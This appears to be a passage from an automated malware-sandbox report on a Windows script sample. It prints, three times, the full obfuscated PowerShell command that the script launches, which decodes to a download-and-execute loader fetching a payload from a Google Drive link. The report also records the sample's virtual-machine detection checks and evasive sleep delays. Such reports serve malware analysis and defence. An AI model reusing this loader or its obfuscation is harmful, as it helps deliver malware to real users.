=Mon$ lae Pan upvPre:Ka as,mpMisp CodOrdaRaatBaraTek+ De$EkkbD aa rak uniBroeO d ');Trolddomskunsternes (Fabrikskomplekserne 'Tan$,ksgD al FooAnnbBl a Hylpha: KaP Torpolel,di Almbelp vo ndrGartBle=sup$LimC eveprorApptsayiza f ai .kaFisbFaliOrnlChaiHyptWriyTen.CarsProp MilTeli ExtP l(Pai$PraTd.wivesl O.s HuksamrFo iCaln Zog scstilkPosuB.drs tsBa u TosPr.e aftBla)B l ');Trolddomskunsternes (Fabrikskomplekserne 'Mol[.erN.ocePret.tu.Angs tre,iarsmevHumiFe cgrues,rP ao lmiLevnDeft MoMsu aCasn ska olgslieB.yrAdn] Wr:Gth:BrssFree T cUnmu,anrYppi nttsvey InPChirbriostitOutoRifcMejotyrl Fo Bof= st ,ys[In.NUboeD.rtTpp.s ossofeOvecUnduN,tr Fri et ubyAfvPBjerKofoKretUnaowitcMatoKinlskrTGluyskipPosesal]A i: ej:Y uT oclObjs Kv1sym2Mas ');$Certifiability=$Preimport[0];$Fortolke=(Fabrikskomplekserne ' re$BlagstaLsano arBMulasjkLKon:GenC BrhMo,a.nnN asn,ndiPoleLe.=ComNb teHooW .i-sp osneBUdnjacce asCArkTKas UbesB uYCams CeTMune dsMTra.sp,nmisEposT De. nowBereNonb LycNonl,isIBrieHusN Hjtopf ');Trolddomskunsternes ($Fortolke);Trolddomskunsternes (Fabrikskomplekserne 'lug$,nkCHyphPreaEnenBa.ns,ei MieAnt.VivHK,nes raAt,d GyeC xr UdsFel[ st$NynULymnFleeIn.n ontRe aUnoi AclBeeeFord Ac]Ani=sk $TrkPUrelsataFe.tBentinteKg.n ytsicilIrras,igDrme CerHol ');$Bufferkapaciteterne=Fabrikskomplekserne 'Unp$ DaCDeph.araBilnCoan raiInteD,m.Und
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Cantharidating Desinficerer afgrdernes Mistakenly Bunsen spadestres #>;$Befleaing='subclans';<#Opinionsdannelserne leia Entomophthorous Hedninger #>;$Essens=$host.PrivateData;If ($Essens) {$Becollier++;}function Fabrikskomplekserne($syngespil){$Brace66=$Frafaldendes+$syngespil.Length-$Becollier;for( $Acuserl=3;$Acuserl -lt $Brace66;$Acuserl+=4){$stevedorerne+=$syngespil[$Acuserl];}$stevedorerne;}function Trolddomskunsternes($Pretabulation){ . ($Untenseness) ($Pretabulation);}$Plattenslager=Fabrikskomplekserne 'DimMsejoDehzsanimetlAntlE.sa a/spi5Unr.Ga 0.ka Wax( K,WAntiPann PodRumoa awIdisAlm t N reT Me Lea1Fil0Fel.ska0si.;fje TrtW.emi G,nCry6Cla4Tan; ,p staxNot6 ra4 Il;Pe Pr r AlvTin:Nya1I t2Ou 1.mt.Bio0Ret)Ice AcGOvee Elc TokF do Mi/met2Fli0 nf1 ,h0Ren0 ta1 nd0 B 1 ar AalFsemiHalrPave vef FioW.ax Il/Tun1As.2 ri1sna. t0Hvi ';$Unentailed=Fabrikskomplekserne ' F.U ,ns alEGr REks-sarABebg EleMa nTipTRes ';$Certifiability=Fabrikskomplekserne ' GehRe t Unt hpFe sFum:Brn/Che/OpddEjerLydi CovJaze nu.,ragA eo CaoMilg ,elB,sesha. .oc.olo,oemFed/ P.u P cNo.?Po e.etxmedpKo o Puras.tMa =VaadFinoFngwMe.nUnll s oTe.a nodPre& igiRidd ar=,la1CluTserFTegXOnyc.fdrPreJP eWOutTD.yGPjamLysaEvic Na2Gr hElejO r-DevV Trsm dL.aro,idWcepxDisw ,es f.sseskBi gUnoBstv1tor7M g6Gyls G. ';$Tilskringskursuset=Fabrikskomplekserne 'F.b>Lac ';$Untenseness=Fabrikskomplekserne ' UniTinEEn xDo ';$Remburserne='Kohoveder';$bakie='\Bumpenes.sam';Trolddomskunsternes (Fabrikskomplekserne 'Tre$ Teg mbl Hao mmb anaLomlsk :EndDFesuvoltFr,itr.aVacb Bll eePo =Mon$ lae Pan upvPre:Ka as,mpMisp CodOrdaRaatBaraTek+ De$EkkbD aa rak uniBroeO d ');Trolddomskunsternes (Fabrikskomplekserne 'Tan$,ksgD al FooAnnbBl a Hylpha: KaP Torpolel,di Almbelp vo ndrGartBle=sup$LimC eveprorApptsayiza f ai .kaFisbFaliOrnlChaiHyptWriyTen.CarsProp MilTeli ExtP l(Pai$PraTd.wivesl O.s HuksamrFo iCaln Zog scstilkPosuB.drs tsBa u TosPr.e aftBla)B l ');Trolddomskunsternes (Fabrikskomplekserne 'Mol[.erN.ocePret.tu.Angs tre,iarsmevHumiFe cgrues,rP ao lmiLevnDeft MoMsu aCasn ska olgslieB.yrAdn] Wr:Gth:BrssFree T cUnmu,anrYppi nttsvey InPChirbriostitOutoRifcMejotyrl Fo Bof= st ,ys[In.NUboeD.rtTpp.s ossofeOvecUnduN,tr Fri et ubyAfvPBjerKofoKretUnaowitcMatoKinlskrTGluyskipPosesal]A i: ej:Y uT oclObjs Kv1sym2Mas ');$Certifiability=$Preimport[0];$Fortolke=(Fabrikskomplekserne ' re$BlagstaLsano arBMulasjkLKon:GenC BrhMo,a.nnN asn,ndiPoleLe.=ComNb teHooW .i-sp osneBUdnjacce asCArkTKas UbesB uYCams CeTMune dsMTra.sp,nmisEposT De. nowBereNonb LycNonl,isIBrieHusN Hjtopf ');Trolddomskunsternes ($Fortolke);Trolddomskunsternes (Fabrikskomplekserne 'lug$,nkCHyphPreaEnenBa.ns,ei MieAnt.VivHK,nes raAt,d GyeC xr UdsFel[ st$NynULymnFleeIn.n ontRe aUnoi AclBeeeFord Ac]Ani=sk $TrkPUrelsataFe.tBentinteKg.n ytsicilIrras,igDrme CerHol ');$Bufferkapaciteterne=Fabrikskomplekserne 'Unp$ DaCDeph.araBilnCoan raiInteD,m.UndJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Service
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5866Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3995Jump to behavior
      Source: C:\Windows\System32\wscript.exe TID: 7664Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7872Thread sleep time: -3689348814741908s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: wscript.exe, 00000000.00000003.1348888983.00000194338E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}@b
      Source: wscript.exe, 00000000.00000003.1349349433.00000194338E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceStoppedOKvmicvssvmicvssUnknownUnknownUnknownWin32_ServiceWin32_ComputerSystemuser-PCvmicvsstructures|S
      Source: wscript.exe, 00000000.00000003.1349349433.00000194338E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicshutdown
      Source: wscript.exe, 00000000.00000003.1349349433.00000194338E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicvss
      Source: wscript.exe, 00000000.00000003.1349349433.00000194338E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceStoppedOKvmicshutdownvmicshutdownUnknownUnknownUnknownWin32_ServiceWin32_ComputerSystemTINA-PCvmicshutdown
      Source: wscript.exe, 00000000.00000003.1349349433.00000194338ED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1331460946.00000194358C7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1351121003.00000194358C7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1332156430.00000194358C7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1331955967.00000194338D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1348682345.00000194358C7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1348888983.00000194338E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1350748051.00000194338EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1332023628.00000194358C7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2635802751.000001D676B76000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: wscript.exe, 00000000.00000003.1332156430.00000194358B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1331460946.00000194358B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1348682345.00000194358B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1332023628.00000194358B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1351121003.00000194358B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW{2yv
      Source: wscript.exe, 00000000.00000002.1350657100.00000194338E4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1349871777.00000194338E4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1349349433.00000194338E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceStoppedOKvmickvpexchangevmickvpexchangeProvides a mechanism to exchange data between the virtual machine and the operating system running on the physical computer.Share ProcessManualNormalC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -pLocalSystemHyper-V Data Exchange ServiceHyper-V Data Exchange ServiceWin32_ServiceWin32_ComputerSystemuser-PCvmickvpexchangeLMEM8
      Source: wscript.exe, 00000000.00000002.1350657100.00000194338E4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1349871777.00000194338E4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1349349433.00000194338E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
      Source: wscript.exe, 00000000.00000003.1348888983.00000194338E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: artbeatvmicheartbeatUnknownUnknownUnknownWin32_ServiceWin32_ComputerSystemTINA-PCvmicheartbeatS
      Source: wscript.exe, 00000000.00000003.1348888983.00000194338E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Yara detected Powershell download and execute
      Source: Yara matchFile source: amsi64_7752.amsi.csv, type: OTHER
      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7752, type: MEMORYSTR
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Cantharidating Desinficerer afgrdernes Mistakenly Bunsen spadestres #>;$Befleaing='subclans';<#Opinionsdannelserne leia Entomophthorous Hedninger #>;$Essens=$host.PrivateData;If ($Essens) {$Becollier++;}function Fabrikskomplekserne($syngespil){$Brace66=$Frafaldendes+$syngespil.Length-$Becollier;for( $Acuserl=3;$Acuserl -lt $Brace66;$Acuserl+=4){$stevedorerne+=$syngespil[$Acuserl];}$stevedorerne;}function Trolddomskunsternes($Pretabulation){ . ($Untenseness) ($Pretabulation);}$Plattenslager=Fabrikskomplekserne 'DimMsejoDehzsanimetlAntlE.sa a/spi5Unr.Ga 0.ka Wax( K,WAntiPann PodRumoa awIdisAlm t N reT Me Lea1Fil0Fel.ska0si.;fje TrtW.emi G,nCry6Cla4Tan; ,p staxNot6 ra4 Il;Pe Pr r AlvTin:Nya1I t2Ou 1.mt.Bio0Ret)Ice AcGOvee Elc TokF do Mi/met2Fli0 nf1 ,h0Ren0 ta1 nd0 B 1 ar AalFsemiHalrPave vef FioW.ax Il/Tun1As.2 ri1sna. t0Hvi ';$Unentailed=Fabrikskomplekserne ' F.U ,ns alEGr REks-sarABebg EleMa nTipTRes ';$Certifiability=Fabrikskomplekserne ' GehRe t Unt hpFe sFum:Brn/Che/OpddEjerLydi CovJaze nu.,ragA eo CaoMilg ,elB,sesha. .oc.olo,oemFed/ P.u P cNo.?Po e.etxmedpKo o Puras.tMa =VaadFinoFngwMe.nUnll s oTe.a nodPre& igiRidd ar=,la1CluTserFTegXOnyc.fdrPreJP eWOutTD.yGPjamLysaEvic Na2Gr hElejO r-DevV Trsm dL.aro,idWcepxDisw ,es f.sseskBi gUnoBstv1tor7M g6Gyls G. ';$Tilskringskursuset=Fabrikskomplekserne 'F.b>Lac ';$Untenseness=Fabrikskomplekserne ' UniTinEEn xDo ';$Remburserne='Kohoveder';$bakie='\Bumpenes.sam';Trolddomskunsternes (Fabrikskomplekserne 'Tre$ Teg mbl Hao mmb anaLomlsk :EndDFesuvoltFr,itr.aVacb Bll eePo =Mon$ lae Pan upvPre:Ka as,mpMisp CodOrdaRaatBaraTek+ De$EkkbD aa rak uniBroeO d ');Trolddomskunsternes (Fabrikskomplekserne 'Tan$,ksgD al FooAnnbBl a Hylpha: KaP Torpolel,di Almbelp vo ndrGartBle=sup$LimC eveprorApptsayiza f ai .kaFisbFaliOrnlChaiHyptWriyTen.CarsProp MilTeli ExtP l(Pai$PraTd.wivesl O.s HuksamrFo iCaln Zog scstilkPosuB.drs tsBa u TosPr.e aftBla)B l ');Trolddomskunsternes (Fabrikskomplekserne 'Mol[.erN.ocePret.tu.Angs tre,iarsmevHumiFe cgrues,rP ao lmiLevnDeft MoMsu aCasn ska olgslieB.yrAdn] Wr:Gth:BrssFree T cUnmu,anrYppi nttsvey InPChirbriostitOutoRifcMejotyrl Fo Bof= st ,ys[In.NUboeD.rtTpp.s ossofeOvecUnduN,tr Fri et ubyAfvPBjerKofoKretUnaowitcMatoKinlskrTGluyskipPosesal]A i: ej:Y uT oclObjs Kv1sym2Mas ');$Certifiability=$Preimport[0];$Fortolke=(Fabrikskomplekserne ' re$BlagstaLsano arBMulasjkLKon:GenC BrhMo,a.nnN asn,ndiPoleLe.=ComNb teHooW .i-sp osneBUdnjacce asCArkTKas UbesB uYCams CeTMune dsMTra.sp,nmisEposT De. nowBereNonb LycNonl,isIBrieHusN Hjtopf ');Trolddomskunsternes ($Fortolke);Trolddomskunsternes (Fabrikskomplekserne 'lug$,nkCHyphPreaEnenBa.ns,ei MieAnt.VivHK,nes raAt,d GyeC xr UdsFel[ st$NynULymnFleeIn.n ontRe aUnoi AclBeeeFord Ac]Ani=sk $TrkPUrelsataFe.tBentinteKg.n ytsicilIrras,igDrme CerHol ');$Bufferkapaciteterne=Fabrikskomplekserne 'Unp$ DaCDeph.araBilnCoan raiInteD,m.UndJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#cantharidating desinficerer afgrdernes mistakenly bunsen spadestres #>;$befleaing='subclans';<#opinionsdannelserne leia entomophthorous hedninger #>;$essens=$host.privatedata;if ($essens) {$becollier++;}function fabrikskomplekserne($syngespil){$brace66=$frafaldendes+$syngespil.length-$becollier;for( $acuserl=3;$acuserl -lt $brace66;$acuserl+=4){$stevedorerne+=$syngespil[$acuserl];}$stevedorerne;}function trolddomskunsternes($pretabulation){ . ($untenseness) ($pretabulation);}$plattenslager=fabrikskomplekserne 'dimmsejodehzsanimetlantle.sa a/spi5unr.ga 0.ka wax( k,wantipann podrumoa awidisalm t n ret me lea1fil0fel.ska0si.;fje trtw.emi g,ncry6cla4tan; ,p staxnot6 ra4 il;pe pr r alvtin:nya1i t2ou 1.mt.bio0ret)ice acgovee elc tokf do mi/met2fli0 nf1 ,h0ren0 ta1 nd0 b 1 ar aalfsemihalrpave vef fiow.ax il/tun1as.2 ri1sna. t0hvi ';$unentailed=fabrikskomplekserne ' f.u ,ns alegr reks-sarabebg elema ntiptres ';$certifiability=fabrikskomplekserne ' gehre t unt hpfe sfum:brn/che/opddejerlydi covjaze nu.,raga eo caomilg ,elb,sesha. .oc.olo,oemfed/ p.u p cno.?po e.etxmedpko o puras.tma =vaadfinofngwme.nunll s ote.a nodpre& igiridd ar=,la1clutserftegxonyc.fdrprejp ewouttd.ygpjamlysaevic na2gr helejo r-devv trsm dl.aro,idwcepxdisw ,es f.sseskbi gunobstv1tor7m g6gyls g. ';$tilskringskursuset=fabrikskomplekserne 'f.b>lac ';$untenseness=fabrikskomplekserne ' unitineen xdo ';$remburserne='kohoveder';$bakie='\bumpenes.sam';trolddomskunsternes (fabrikskomplekserne 'tre$ teg mbl hao mmb analomlsk :enddfesuvoltfr,itr.avacb bll eepo =mon$ lae pan upvpre:ka as,mpmisp codordaraatbaratek+ de$ekkbd aa rak unibroeo d ');trolddomskunsternes (fabrikskomplekserne 'tan$,ksgd al fooannbbl a hylpha: kap torpolel,di almbelp vo ndrgartble=sup$limc eveprorapptsayiza f ai .kafisbfaliornlchaihyptwriyten.carsprop milteli extp l(pai$pratd.wivesl o.s huksamrfo icaln zog scstilkposub.drs tsba u tospr.e aftbla)b l ');trolddomskunsternes (fabrikskomplekserne 'mol[.ern.ocepret.tu.angs tre,iarsmevhumife cgrues,rp ao lmilevndeft momsu acasn ska olgslieb.yradn] wr:gth:brssfree t cunmu,anryppi nttsvey inpchirbriostitoutorifcmejotyrl fo bof= st ,ys[in.nuboed.rttpp.s ossofeovecundun,tr fri et ubyafvpbjerkofokretunaowitcmatokinlskrtgluyskipposesal]a i: ej:y ut oclobjs kv1sym2mas ');$certifiability=$preimport[0];$fortolke=(fabrikskomplekserne ' re$blagstalsano arbmulasjklkon:genc brhmo,a.nnn asn,ndipolele.=comnb tehoow .i-sp osnebudnjacce ascarktkas ubesb uycams cetmune dsmtra.sp,nmisepost de. nowberenonb lycnonl,isibriehusn hjtopf ');trolddomskunsternes ($fortolke);trolddomskunsternes (fabrikskomplekserne 'lug$,nkchyphpreaenenba.ns,ei mieant.vivhk,nes raat,d gyec xr udsfel[ st$nynulymnfleein.n ontre aunoi aclbeeeford ac]ani=sk $trkpurelsatafe.tbentintekg.n ytsicilirras,igdrme cerhol ');$bufferkapaciteterne=fabrikskomplekserne 